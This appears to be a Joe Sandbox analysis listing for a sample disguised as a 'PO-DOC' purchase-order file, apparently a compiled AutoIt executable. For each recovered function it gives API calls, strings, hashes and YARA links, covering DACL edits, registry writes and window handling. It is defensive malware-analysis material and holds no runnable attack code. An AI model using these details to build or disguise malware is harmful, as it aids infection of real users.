Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: 406525561840652f5618406524561840652f561840652e561840652f561840652f561840652f561840652f56184065235618406523561840652c56184065295618$AutoIt v3 GUI
API String ID: 1458621304-3626949795
Opcode ID: f24e544bb5b12a04e597e69c7488849bd7d099b01a96c747fa91980524b9a859
Instruction ID: e49e1a5c7cf48571bb7a6d3c848cfac700362ed900580c1e0190e70899a7dbe7
Opcode Fuzzy Hash: f24e544bb5b12a04e597e69c7488849bd7d099b01a96c747fa91980524b9a859
Instruction Fuzzy Hash: 45B16C31A0120ADFDF14DFA8DC49BEA7BB5FB48315F11461AFA25AB290DB30A851CB51

Function 001A0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001A10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001A1114
Part of subcall function 001A10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A1120
Part of subcall function 001A10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A112F
Part of subcall function 001A10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A1136
Part of subcall function 001A10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001A114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001A0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001A0E29
GetLengthSid.ADVAPI32(?), ref: 001A0E40
GetAce.ADVAPI32(?,00000000,?), ref: 001A0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001A0E96
GetLengthSid.ADVAPI32(?), ref: 001A0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 001A0EB5
HeapAlloc.KERNEL32(00000000), ref: 001A0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 001A0EDD
CopySid.ADVAPI32(00000000), ref: 001A0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001A0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001A0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 001A0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A0F6E
HeapFree.KERNEL32(00000000), ref: 001A0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A0F7E
HeapFree.KERNEL32(00000000), ref: 001A0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A0F8E
HeapFree.KERNEL32(00000000), ref: 001A0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 001A0FA1
HeapFree.KERNEL32(00000000), ref: 001A0FA8

Part of subcall function 001A1193: GetProcessHeap.KERNEL32(00000008,001A0BB1,?,00000000,?,001A0BB1,?), ref: 001A11A1
Part of subcall function 001A1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,001A0BB1,?), ref: 001A11A8
Part of subcall function 001A1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001A0BB1,?), ref: 001A11B7

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 4e23ed59ee41935c5299450197e0a53c34ecfb0a5e53925c70f76261c7bef697
Instruction ID: a35b4354d1f988e0f65a25b07db7eefe89f66d8225e7ba28a22c3c5125e1938c
Opcode Fuzzy Hash: 4e23ed59ee41935c5299450197e0a53c34ecfb0a5e53925c70f76261c7bef697
Instruction Fuzzy Hash: F2716D7690121AEFDF219FA4DC44FAEBBB8BF09301F044516F919F6191D731A945CBA0

Function 001CC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001CC4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,001DCC08,00000000,?,00000000,?,?), ref: 001CC544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 001CC5A4
_wcslen.LIBCMT ref: 001CC5F4
_wcslen.LIBCMT ref: 001CC66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 001CC6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 001CC7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 001CC84D
RegCloseKey.ADVAPI32(?), ref: 001CC881
RegCloseKey.ADVAPI32(00000000), ref: 001CC88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 001CC960

Strings

REG_SZ, xrefs: 001CC644
REG_QWORD, xrefs: 001CC8C3
REG_BINARY, xrefs: 001CC913
REG_DWORD, xrefs: 001CC804
REG_EXPAND_SZ, xrefs: 001CC5CD
REG_MULTI_SZ, xrefs: 001CC6F5

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: acfc72c238be3a9c3b479ce740a1a3f1f25b0f9841f5190aeec45bc169926757
Instruction ID: 84717f4f3d07245db59c44a7dd2da2215eff397ce42af090db74f39d8aa9de88
Opcode Fuzzy Hash: acfc72c238be3a9c3b479ce740a1a3f1f25b0f9841f5190aeec45bc169926757
Instruction Fuzzy Hash: AD1255756042119FDB14DF28C891F2AB7E5EF98714F05889DF88A9B3A2DB31ED41CB81

Function 001D091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001D09C6
_wcslen.LIBCMT ref: 001D0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001D0A54
_wcslen.LIBCMT ref: 001D0A8A
_wcslen.LIBCMT ref: 001D0B06
_wcslen.LIBCMT ref: 001D0B81

Part of subcall function 0015F9F2: _wcslen.LIBCMT ref: 0015F9FD

Part of subcall function 001A2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001A2BFA

Strings

SELECT, xrefs: 001D0D11
UNCHECK, xrefs: 001D0D3E
EXPAND, xrefs: 001D0BF8
CHECK, xrefs: 001D0A85, 001D0AA0
EXISTS, xrefs: 001D0B7C, 001D0B97
GETSELECTED, xrefs: 001D0C4E
GETTEXT, xrefs: 001D0C97
GETITEMCOUNT, xrefs: 001D0C1E
ISCHECKED, xrefs: 001D0CE1
GETTOTALCOUNT, xrefs: 001D09F2, 001D0A17
COLLAPSE, xrefs: 001D0B01, 001D0B1C

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: b652f3fe417f09f484b25c9906d7951f962cba3f0b76a3061466460dd2eec9b4
Instruction ID: f613344b22f84bbe827fb7213f0ab866ce8cd8c9cb5b817583b41635d6ab27ee
Opcode Fuzzy Hash: b652f3fe417f09f484b25c9906d7951f962cba3f0b76a3061466460dd2eec9b4
Instruction Fuzzy Hash: 91E1D1356087118FC715DF24C450A2AB7E2FFA8318F15895EF89A9B3A2D731ED45CB81

Function 001CC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,001CB6AE,?,?), ref: 001CC9B5
_wcslen.LIBCMT ref: 001CC9F1
_wcslen.LIBCMT ref: 001CCA68
_wcslen.LIBCMT ref: 001CCA9E
_wcslen.LIBCMT ref: 001CCAF9
_wcslen.LIBCMT ref: 001CCB2F
_wcslen.LIBCMT ref: 001CCB7F

Strings

HKCC, xrefs: 001CCBAC
HKCU, xrefs: 001CCBCE
HKU, xrefs: 001CCBF0
HKEY_CLASSES_ROOT, xrefs: 001CCAF3, 001CCAF8
HKEY_CURRENT_CONFIG, xrefs: 001CCB79, 001CCB7E
HKCR, xrefs: 001CCB29, 001CCB2E
HKEY_LOCAL_MACHINE, xrefs: 001CCA62, 001CCA67
HKLM, xrefs: 001CCA98, 001CCA9D
HKEY_CURRENT_USER, xrefs: 001CCBBD
HKEY_USERS, xrefs: 001CCBDF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: ea6126b42ff92a778d90d226aba8ce6b7e9d849aaeb82f0ac723f0f18fe44f6f
Instruction ID: cef471f96e38b848c485dfc7e59b594388e815fb111ae15e7194639a8cf588b9
Opcode Fuzzy Hash: ea6126b42ff92a778d90d226aba8ce6b7e9d849aaeb82f0ac723f0f18fe44f6f
Instruction Fuzzy Hash: 5B71D232A1052A8BCB20DEBC8941BBA3391ABB4794B15052CF86A9B295F731DD55C3E0

Function 001D833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001D835A
_wcslen.LIBCMT ref: 001D836E
_wcslen.LIBCMT ref: 001D8391
_wcslen.LIBCMT ref: 001D83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001D83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,001D5BF2), ref: 001D844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001D8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001D84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001D8501
FreeLibrary.KERNEL32(?), ref: 001D850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001D851D
DestroyIcon.USER32(?,?,?,?,?,001D5BF2), ref: 001D852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001D8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 001D8555

Strings

.dll, xrefs: 001D83AB
.exe, xrefs: 001D8388
.icl, xrefs: 001D8368

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: f08f93fc3e1db0d7b9d6928fe5a64c83686e5c2997f0a47af324e95661c58a30
Instruction ID: a858ec16edd9dd68c5a42c43e5d8864fd08d786f7d3768068ded747882375cf6
Opcode Fuzzy Hash: f08f93fc3e1db0d7b9d6928fe5a64c83686e5c2997f0a47af324e95661c58a30
Instruction Fuzzy Hash: 9761D071940216BBEB14DF64DC81BBF77A8FB18B11F10460AF915DA2D1DB74A990CBA0

Function 00147778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#cs, xrefs: 00147873, 001478C5
#ce, xrefs: 001478ED
Unterminated group of comments, xrefs: 0018528C
#comments-start, xrefs: 0014785F, 001478B1
#pragma compile, xrefs: 001477D3
', xrefs: 00185169
#notrayicon, xrefs: 001477E7
", xrefs: 00185153
#OnAutoItStartRegister, xrefs: 00147817
Bad directive syntax error, xrefs: 0018519A
#include-once, xrefs: 0014782F
#requireadmin, xrefs: 001477FF
#include, xrefs: 00147847
#comments-end, xrefs: 001478D9
Cannot parse #include, xrefs: 00185279

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: d3dd82e881cd1c3cb8b42555c9aef2fa9738d5ed36541014e1bae147448c8980
Instruction ID: 30d857d930ef8672c757438995aa2fa9c6d368e7f858e7ac3a2e5b4cc2ba5421
Opcode Fuzzy Hash: d3dd82e881cd1c3cb8b42555c9aef2fa9738d5ed36541014e1bae147448c8980
Instruction Fuzzy Hash: F2812B71A44205BBDB20BF60DC46FAF37A9EF25300F054025F905AB1E6EB71DA26CB91

Function 001A5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 001A5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001A5A40
SetWindowTextW.USER32(?,?), ref: 001A5A57
GetDlgItem.USER32(?,000003EA), ref: 001A5A6C
SetWindowTextW.USER32(00000000,?), ref: 001A5A72
GetDlgItem.USER32(?,000003E9), ref: 001A5A82
SetWindowTextW.USER32(00000000,?), ref: 001A5A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001A5AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001A5AC3
GetWindowRect.USER32(?,?), ref: 001A5ACC
_wcslen.LIBCMT ref: 001A5B33
SetWindowTextW.USER32(?,?), ref: 001A5B6F
GetDesktopWindow.USER32 ref: 001A5B75
GetWindowRect.USER32(00000000), ref: 001A5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 001A5BD3
GetClientRect.USER32(?,?), ref: 001A5BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 001A5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001A5C2F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: f0df1450584d64e2a4f9e92005d250b6d09bcb090f8adf691e588628ebb489c5
Instruction ID: de46000023134d12b05844a6bb561e597328f17b6d0850c58d8b645edd1f34c7
Opcode Fuzzy Hash: f0df1450584d64e2a4f9e92005d250b6d09bcb090f8adf691e588628ebb489c5
Instruction Fuzzy Hash: 0C718135905B05EFDB20DFA8CD85AAEBBF6FF48705F104919E142A35A0D774E944CB60

Function 001A30F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001A318D
_wcslen.LIBCMT ref: 001A31F8

Strings

NAME, xrefs: 001A3335, 001A3346
INSTANCE, xrefs: 001A3453
TEXT, xrefs: 001A347C
CLASS, xrefs: 001A3188, 001A31A5
REGEXPCLASS, xrefs: 001A3255, 001A3266
CLASSNN, xrefs: 001A31F3, 001A3204
[ , xrefs: 001A339A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[
API String ID: 176396367-3679483830
Opcode ID: 32d383bcbd9958ed5d078f9e9fd22b6eb3d2e86b252542d7f13d5dde0dbf07e7
Instruction ID: 327637a4215d92fa7b6c8b1ea2cbd0bbeff46afa2e9dd221637401f4966c227e
Opcode Fuzzy Hash: 32d383bcbd9958ed5d078f9e9fd22b6eb3d2e86b252542d7f13d5dde0dbf07e7
Instruction Fuzzy Hash: 5DE1F736A006269BCB18DF78C8517EEFBB0BF16714F55811AF466E7240DB30AE85C790

Function 001600C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001600C6

Part of subcall function 001600ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0021070C,00000FA0,735D41DC,?,?,?,?,001823B3,000000FF), ref: 0016011C
Part of subcall function 001600ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001823B3,000000FF), ref: 00160127
Part of subcall function 001600ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001823B3,000000FF), ref: 00160138
Part of subcall function 001600ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0016014E
Part of subcall function 001600ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0016015C
Part of subcall function 001600ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0016016A
Part of subcall function 001600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00160195
Part of subcall function 001600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001601A0

___scrt_fastfail.LIBCMT ref: 001600E7

Part of subcall function 001600A3: __onexit.LIBCMT ref: 001600A9

Strings

kernel32.dll, xrefs: 00160133
WakeAllConditionVariable, xrefs: 00160162
InitializeConditionVariable, xrefs: 00160148
SleepConditionVariableCS, xrefs: 00160154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00160122

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 2a9b3643a1705994e77e1d7de1fe7cdd23eb6782a8d0cc54157550bf91359f43
Instruction ID: cbcb60a25bef8deb9bb7b75d2abe73185336758b33e3f9efdad3e4200d7c6d19
Opcode Fuzzy Hash: 2a9b3643a1705994e77e1d7de1fe7cdd23eb6782a8d0cc54157550bf91359f43
Instruction Fuzzy Hash: 15212932642711ABD7126BA4AC4AB6B73D5EB1EB51F10052BFC02D67D1DFB09C81CA90

Function 001B44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,001DCC08), ref: 001B4527
_wcslen.LIBCMT ref: 001B453B
_wcslen.LIBCMT ref: 001B4599
_wcslen.LIBCMT ref: 001B45F4
_wcslen.LIBCMT ref: 001B463F
_wcslen.LIBCMT ref: 001B46A7

Part of subcall function 0015F9F2: _wcslen.LIBCMT ref: 0015F9FD

GetDriveTypeW.KERNEL32(?,00206BF0,00000061), ref: 001B4743

Strings

network, xrefs: 001B469D, 001B46A2
ramdisk, xrefs: 001B46F1
cdrom, xrefs: 001B458F, 001B4594
unknown, xrefs: 001B4708
all, xrefs: 001B4531, 001B4536
removable, xrefs: 001B45EA, 001B45EF
fixed, xrefs: 001B4635, 001B463A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 14deca195b8d3cf7832cf13359ad8c7cd11db80db252521f7da1b618c72f1e49
Instruction ID: 1a9f9f85fb66672a8ad508265bd9432e0dbee7c5e48823c4ec52127ff3121878
Opcode Fuzzy Hash: 14deca195b8d3cf7832cf13359ad8c7cd11db80db252521f7da1b618c72f1e49
Instruction Fuzzy Hash: 5DB1F5716083129FC724DF28C890ABEB7E5BFA9764F50891DF496C7292DB30D845CB92

Function 001D911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2

DragQueryPoint.SHELL32(?,?), ref: 001D9147

Part of subcall function 001D7674: ClientToScreen.USER32(?,?), ref: 001D769A
Part of subcall function 001D7674: GetWindowRect.USER32(?,?), ref: 001D7710
Part of subcall function 001D7674: PtInRect.USER32(?,?,001D8B89), ref: 001D7720

SendMessageW.USER32(?,000000B0,?,?), ref: 001D91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001D91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001D91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 001D9225
SendMessageW.USER32(?,000000B0,?,?), ref: 001D923E
SendMessageW.USER32(?,000000B1,?,?), ref: 001D9255
SendMessageW.USER32(?,000000B1,?,?), ref: 001D9277
DragFinish.SHELL32(?), ref: 001D927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 001D9371

Strings

@GUI_DRAGFILE, xrefs: 001D9320
p#!, xrefs: 001D92BB
@GUI_DRAGID, xrefs: 001D92E9
@GUI_DROPID, xrefs: 001D929E

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#!
API String ID: 221274066-1008745475
Opcode ID: fd2f0288e0a539af16e21c223bbec16a4382a59700e573e6dc8dbac27ceae4db
Instruction ID: 6da27d9835edb9261ba6dda3ab6c1bc74119e8cfba8fadb0c683ca8f09b78ebc
Opcode Fuzzy Hash: fd2f0288e0a539af16e21c223bbec16a4382a59700e573e6dc8dbac27ceae4db
Instruction Fuzzy Hash: 88618B71109301AFD701DF64DC89DAFBBE8EF99350F000A1EF595932A1DB309A49CB92

Function 001CAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001CB198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001CB1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001CB1D4
_wcslen.LIBCMT ref: 001CB200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001CB214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001CB236
_wcslen.LIBCMT ref: 001CB332

Part of subcall function 001B05A7: GetStdHandle.KERNEL32(000000F6), ref: 001B05C6

_wcslen.LIBCMT ref: 001CB34B
_wcslen.LIBCMT ref: 001CB366
